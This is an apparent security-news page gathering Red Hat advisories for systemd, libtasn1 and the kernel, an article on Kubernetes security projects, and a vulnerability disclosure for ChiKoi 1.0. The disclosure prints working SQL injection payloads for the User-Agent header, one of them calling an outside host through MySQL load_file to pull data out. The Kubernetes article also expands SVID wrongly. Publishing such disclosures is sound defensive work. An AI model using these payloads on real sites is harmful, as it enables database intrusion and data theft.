systemd-libs-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-libs-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-pam-239-68.el8_7.1.x86_64.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-pam-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-tests-239-68.el8_7.1.x86_64.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-tests-debuginfo-239-68.el8_7.1.x86_64.rpm  
systemd-udev-239-68.el8_7.1.x86_64.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.i686.rpm  
systemd-udev-debuginfo-239-68.el8_7.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3821  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i9NzjgjWX9erEAQjKXg//akCX8D/qkLQEtcWYa0m9aXlkPwsCWkPY  
ScbAPZer9Pq8Nc+F9QTwuQoip+4iZ9nmUzOfqBllp81JMnn2gzT0y3NZWNNxZvaX  
1zMyUo7kA+tBDUL0PkMjchNRU/JWAlL962jXmUnuFMRoNyjFuccvodCvalSTuH2q  
eleJ+ClSVqPyusDbzNsXT/00d9ee7IFDTvmxUaf5jDpT6kUH3h/P4QtfQPLR7WL1  
/khIvs0r6FKaSqjYrhkeo9DYCo/VDzWmKL3FbY4ZY3EiEtbbwGrgPa4PSAxNIH7x  
8UKhzMRi22bcqIpdFxdcWaMGzl0vTeJHbHx3BgPtCGFldivlu6DBth0iRMbOpQsH  
zZu6/W8rOBbFw1hX2vfOKgSt3EcP08BCvOYq+5m+kUONPpbkDa4E8VtbEb8Tl/FV  
CdhNOhQTT4XTa2hrxYI/0H26i2C/m3YZyGpm2XzsrZtQLEatFjI1HDR6nPdeNNsF  
HxuYxr5ac8LCTDbg1hgRtjj2bVQvoCV5PwbbA82Q7h4kRuuoN1iedq/p+7hhPVjh  
cQlPK6ivq4txHCz0R0azo4yA6lIBM4CwxtjdWjEqAt85Wr3cW3WpOO3g0KCrPPRO  
M/Knn7fxDWbusU+m1mp6CM6A1ITmWcUvtJHhwD8dv1SjXwHIWwHPlD7TiI2Y3icZ  
I8bFgejxn4U=  
=QrfL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0100-01

Red Hat Security Advisory 2023-0116-01 - A library that provides Abstract Syntax Notation One parsing and structures management, and Distinguished Encoding Rules encoding and decoding functions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: libtasn1 security update  
Advisory ID:       RHSA-2023:0116-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0116  
Issue date:        2023-01-12  
CVE Names:         CVE-2021-46848   
=====================================================================

1. Summary:

An update for libtasn1 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

A library that provides Abstract Syntax Notation One (ASN.1, as specified  
by the X.680 ITU-T recommendation) parsing and structures management, and  
Distinguished Encoding Rules (DER, as per X.690) encoding and decoding  
functions.

Security Fix(es):

* libtasn1: Out-of-bound access in ETYPE_OK (CVE-2021-46848)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2140058 - CVE-2021-46848 libtasn1: Out-of-bound access in ETYPE_OK

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
libtasn1-debuginfo-4.13-4.el8_7.aarch64.rpm  
libtasn1-debugsource-4.13-4.el8_7.aarch64.rpm  
libtasn1-devel-4.13-4.el8_7.aarch64.rpm  
libtasn1-tools-4.13-4.el8_7.aarch64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.aarch64.rpm

ppc64le:  
libtasn1-debuginfo-4.13-4.el8_7.ppc64le.rpm  
libtasn1-debugsource-4.13-4.el8_7.ppc64le.rpm  
libtasn1-devel-4.13-4.el8_7.ppc64le.rpm  
libtasn1-tools-4.13-4.el8_7.ppc64le.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.ppc64le.rpm

s390x:  
libtasn1-debuginfo-4.13-4.el8_7.s390x.rpm  
libtasn1-debugsource-4.13-4.el8_7.s390x.rpm  
libtasn1-devel-4.13-4.el8_7.s390x.rpm  
libtasn1-tools-4.13-4.el8_7.s390x.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.s390x.rpm

x86_64:  
libtasn1-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-debuginfo-4.13-4.el8_7.x86_64.rpm  
libtasn1-debugsource-4.13-4.el8_7.i686.rpm  
libtasn1-debugsource-4.13-4.el8_7.x86_64.rpm  
libtasn1-devel-4.13-4.el8_7.i686.rpm  
libtasn1-devel-4.13-4.el8_7.x86_64.rpm  
libtasn1-tools-4.13-4.el8_7.x86_64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
libtasn1-4.13-4.el8_7.src.rpm

aarch64:  
libtasn1-4.13-4.el8_7.aarch64.rpm  
libtasn1-debuginfo-4.13-4.el8_7.aarch64.rpm  
libtasn1-debugsource-4.13-4.el8_7.aarch64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.aarch64.rpm

ppc64le:  
libtasn1-4.13-4.el8_7.ppc64le.rpm  
libtasn1-debuginfo-4.13-4.el8_7.ppc64le.rpm  
libtasn1-debugsource-4.13-4.el8_7.ppc64le.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.ppc64le.rpm

s390x:  
libtasn1-4.13-4.el8_7.s390x.rpm  
libtasn1-debuginfo-4.13-4.el8_7.s390x.rpm  
libtasn1-debugsource-4.13-4.el8_7.s390x.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.s390x.rpm

x86_64:  
libtasn1-4.13-4.el8_7.i686.rpm  
libtasn1-4.13-4.el8_7.x86_64.rpm  
libtasn1-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-debuginfo-4.13-4.el8_7.x86_64.rpm  
libtasn1-debugsource-4.13-4.el8_7.i686.rpm  
libtasn1-debugsource-4.13-4.el8_7.x86_64.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.i686.rpm  
libtasn1-tools-debuginfo-4.13-4.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i8dzjgjWX9erEAQiZmhAAmQwNAKws70pWIocKzUsb/fYYYMcchqrn  
43gAEVYZ+USKwd0/le9Xbhx7Z22mrabueClq9A74J4B2YXmzFqOJLOz+7LCQAx8+  
B86MlnkcRHNTT5tyi6qmWTm99GqOpyuKf30N5AYceAfBbCO6D9B2bBEyaIb+uSwB  
Sw5EJJFblXhZlHF67K6Lp7I6NSj5aSK+KT6Jru5qJQ/v6K5TznOIyvUJriW4GyQK  
n+xhXLizOV14Rkh6TaWarz7fIKWsAffLUU+n2ZJ3bPbRrL7PqNrTm46AJoZgNK51  
0IbA5xORFGgJaUk+3dTiwvqr6yBSWGWyztqOi7ywoGdeGZf768YHzcMNbTqAGmrd  
wETBwvg/QMSZHeJ62ALGOnkGgzFZqr8/Yu4hJ2Tb8D6oww6MWO4E2Z/BB8madOA+  
q05+JfrIDe3WU+GMYjlmzjezWbKmAQdUnbPkX0fCYtT+0D7R8HN8MLCOR8Bi/Vlo  
06gjDT0rKElpETR81LF70shM6vXRQ4UjmwmPXcHbNTCiNSgE8NNy7woEZT1rsYog  
dY2Y9Ah2nodWTgObLn2X9XEsgjr/lc2Dc4l3DCl1l2sdI74UstqAiYiM6L6QTC/r  
E5wlx10mcbHPTXUOh+NbESzH5IWuqKXaxWjdp0R4vCLuN4+WUHAu9dN2YQTk1E89  
m3+mOt3oApY=  
=53fB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0116-01

Red Hat Security Advisory 2023-0099-01 - Kernel-based Virtual Machine offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems. Issues addressed include an out of bounds read vulnerability.

Red Hat Security Advisory 2023-0099-01

Organizations must be vigilant about balancing performance gains with security, governance, and compliance as they expand their use of Kubernetes.

It's not so much whether organizations are using Kubernetes today, but how they are expanding its use. The use of multiple clusters, for example, is increasing and moving across organizational boundaries. Kubernetes itself is being shored up to meet the resulting security issues. The newest version, Kubernetes 1.26, adds features designed to strengthen the chain of trust, among other security updates. In fact, there are a number of projects organizations should be watching — and potentially evaluating — to ensure they are optimizing their use of Kubernetes while building stronger security, observability, governance, and compliance.

**SPIFFE and SPIRE****

Identity for everything is an important part of securing your Kubernetes environment, but end-to-end identity is still an unsolved problem — especially in multicluster Kubernetes environments. Say you have a service in Kubernetes and you need to authenticate to an off-cluster service that's running in the cloud or on-premises. How do you ensure you have a secure chain of identity from the launch of the service to all of the things it's communicating with and connecting to — on and off cluster?

The SPIFFE project is a set of open source standards for securely identifying software systems in workloads across heterogeneous environments and organizational boundaries. Secure Production Identity Framework for Everyone (SPIFFE) defines short-lived cryptographic identity documents, or Shadow Virtual Intrusion Detection System (SVIDS), that workloads can use to authenticate to other workloads. SPIFFE's partner in identity is SPIRE, the SPIFFE runtime environment. SPIRE implements the SPIFFE spec, enforcing multifactor attestation to issue identities. While there is still work to be done, the SPIFFE and SPIRE projects — both incubated by the Cloud Native Computing Foundation (CNCF) — are helping set the groundwork not only for end-to-end identity but also zero trust. 

****Sigstore****

The old adage that a chain is only as strong as its weakest link couldn't be truer than when it comes to the software supply chain. As shown by the rash of supply chain hacks we've seen in the past few years — attacks that are likely to increase as the stakes grow higher — it's increasingly important to ensure that nothing in the supply chain has been tampered with. One of the ways to do that is to sign everything — especially if you are doing everything (or even most things) as code.

Sigstore — under the auspices of the Linux Foundation — is intended to make cryptographic signing in the supply chain easier. Sigstore removes the cryptography burden from developers, enabling them to use an email address via the OpenID Connect (OIDC) protocol as a preexisting identifier to sign their code. We're seeing organizations implement Sigstore in more traditional ways, but it will be interesting to see if they adopt OIDC-based signing (through the Fulcio portion of the Sigstore project) and the Rekor signature log as a more agile way to manage signing and attestation of signatures or verification of signatures. It will also be interesting to see if Sigstore is eventually implemented not just in new products, but also within the enterprise itself.

****Kyverno and OPA Gatekeeper**

Kyverno, which provides Kubernetes-native policy management, is a project to watch because organizations are paying more attention to admission policies, particularly as the Kubernetes community moves toward pod security admission. There are only three profiles associated with Kubernetes-native pod security admission — a model that is simple by design. If you want more complexity, you need to go with something like Gatekeeper and Open Policy Agent (OPA). Some organizations find Kyverno easier to use with Kubernetes. It's YAML-based, so it doesn't require learning a new language. However, other organizations have invested in learning Rego, the language used with Open Policy Agent, as OPA is a general-purpose policy engine that can be used to automate policies throughout the stack. Indeed, there are a variety of open source policy engines available right now. The real question is whether the landscape will continue to be dotted with engines that have varying degrees of integration with Kubernetes, or if one will eventually become the de facto standard.  

**eBPF-Based Projects**

Kubernetes and the technologies it works with rely heavily on core Linux capabilities. One of these is Extended Berkeley Packet Filter(eBPF), which is increasingly used in networking, security and auditing, and tracing and monitoring tools. Importantly, when it comes to runtime security, eBPF provides observability at a deep level. You can't secure what you can't see, and eBPF provides the level of observability you need for Kubernetes and container platforms in a more consumable fashion. eBPF is being leveraged by many projects, including Falco, a Kubernetes runtime security tool, and Cilium, which provides, secures, and observes network connectivity among container workloads. The biggest indicator of which projects will rise to the top is how nicely they play with Kubernetes. For example, Cilium is interesting because it is written in Go rather than C, which makes it easier to integrate into Kubernetes.

**Kubernetes Networking Projects**

We're seeing more and more organizations deploy multiple clusters, with the resulting need for solutions that communicate or interact across clusters. Skupper is interesting because it enables organizations to create a kind of virtual application network from namespaces in one or more Kube clusters. It's a whole new approach to managing communication between clusters, negating the need for VPNs or special firewall rules. The Gateway API, which comes from the Kube SIG Network, is working to evolve and secure Kubernetes service networking to make it more extensible, with a set of APIs that push it beyond L3 to L4 and L7. Gateway API is an open source project managed by the SIG Network community.

**Conclusion**

As organizations expand their use of Kubernetes, they must constantly be vigilant about balancing performance gains with security, governance, and compliance.

Kubernetes-Related Security Projects to Watch in 2023

ChiKoi version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: ChiKoi-1.0 SQLi## Author: nu11secur1ty## Date: 01.12.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'was submitted in the User-Agent HTTP header.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The attacker can steal all information from this system and canseriously harm the users of this system,such as extracting bank accounts through which they pay each other, etc.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: User-Agent (User-Agent)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNIONSELECT 6994) END))-- -    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR---```[+] Online:```MySQL---Parameter: User-Agent (User-Agent)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNIONSELECT 6426) END))-- ----```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)## Proof and Exploit:[href](https://streamable.com/7x69yz)## Time spent`01:30:00`## Writing an exploit`00:05:00`

ChiKoi 1.0 SQL Injection

Red Hat Security Advisory 2023-0101-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:0101-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0101  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2964 CVE-2022-4139   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

* kernel: i915: Incorrect GPU TLB flush can lead to random memory access  
(CVE-2022-4139)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* RHEL8.4 - zfcp: fix missing auto port scan and thus missing target ports  
(BZ#2127849)

* vfio zero page mappings fail after 2M instances (BZ#2128515)

* ice: Driver Update up to 5.19 (BZ#2130992)

* atlantic: missing hybernate/resume fixes (BZ#2131935)

* Bluefield 2 DPU would crash and reboot due to a kernel panic (BZ#2134084)

* Fix issue that enables STABLE_WRITES by default and causes performance  
regressions (BZ#2135813)

* ice: Intel E810 PTP clock glitching (BZ#2136036)

* ice: configure link-down-on-close on and change interface mtu to 9000,the  
interface can't up (BZ#2136216)

* ice: dump additional CSRs for Tx hang debugging (BZ#2136513)

* ice,iavf: system panic during sriov sriov_test_cntvf_reboot testing  
(BZ#2137270)

* After upgrading to ocp4.11.1, our dpdk application using vlan strip  
offload is not working (BZ#2138157)

* i40e: orphaned-leaky memory when interacting with driver memory  
parameters (BZ#2138205)

* WARNING: CPU: 0 PID: 9637 at kernel/time/hrtimer.c:1309  
hrtimer_start_range_ns+0x35d/0x400 (BZ#2138953)

* DELL EMC 8.6-RT: System is not booting into RT Kernel with perc12.  
(BZ#2139216)

* Lenovo 8.7: The VGA display shows no signal when install RHEL8.7  
(BZ#2140152)

* Host Pod -> NodePort Service traffic (Host Backend - Same Node) Flow  
Iperf Cannot Pass Traffic (BZ#2141878)

* mlx5_core: mlx5_cmd_check messages scrolling with hardware offload  
enabled (BZ#2141957)

* net/ice: VIRTCHNL_OP_CONFIG_VSI_QUEUES command handling failure with  
in-tree driver (BZ#2142017)

* RHEL:8.6+ IBM Partner issue - Loopback driver with ABORT_TASKS causing  
hangs in scsi eh, this bug was cloned for RHEL8.6 and need this patch in  
8.6+ (BZ#2144583)

* AMdCLIENT 8.8: The kernel command line parameter "nomodeset" not working  
properly (BZ#2145218)

* Path loss during Volume Ownership Change on RHEL 8.7 SAS (BZ#2147374)

* net/ice: OP_SET_RSS_HENA command not supported with in-tree driver  
(BZ#2148130)

* iavf panic: iavf 0000:ca:01.0: Failed to init adminq: -53 (BZ#2149081)

* Intel 8.8 iavf: Driver Update (bugfixes) (BZ#2149742)

* Azure RHEL-8 PCI: hv: Do not set PCI_COMMAND_MEMORY to reduce VM boot  
time (BZ#2150912)

* RHEL-8.7: System fails to boot with soft lockup while loading/unloading  
an unsigned (E) kernel module. (BZ#2152206)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.  
2147572 - CVE-2022-4139 kernel: i915: Incorrect GPU TLB flush can lead to random memory access

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kernel-4.18.0-425.10.1.el8_7.src.rpm

aarch64:  
bpftool-4.18.0-425.10.1.el8_7.aarch64.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-core-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-425.10.1.el8_7.noarch.rpm  
kernel-doc-4.18.0-425.10.1.el8_7.noarch.rpm

ppc64le:  
bpftool-4.18.0-425.10.1.el8_7.ppc64le.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-core-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm

s390x:  
bpftool-4.18.0-425.10.1.el8_7.s390x.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
perf-4.18.0-425.10.1.el8_7.s390x.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
python3-perf-4.18.0-425.10.1.el8_7.s390x.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm

x86_64:  
bpftool-4.18.0-425.10.1.el8_7.x86_64.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-core-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
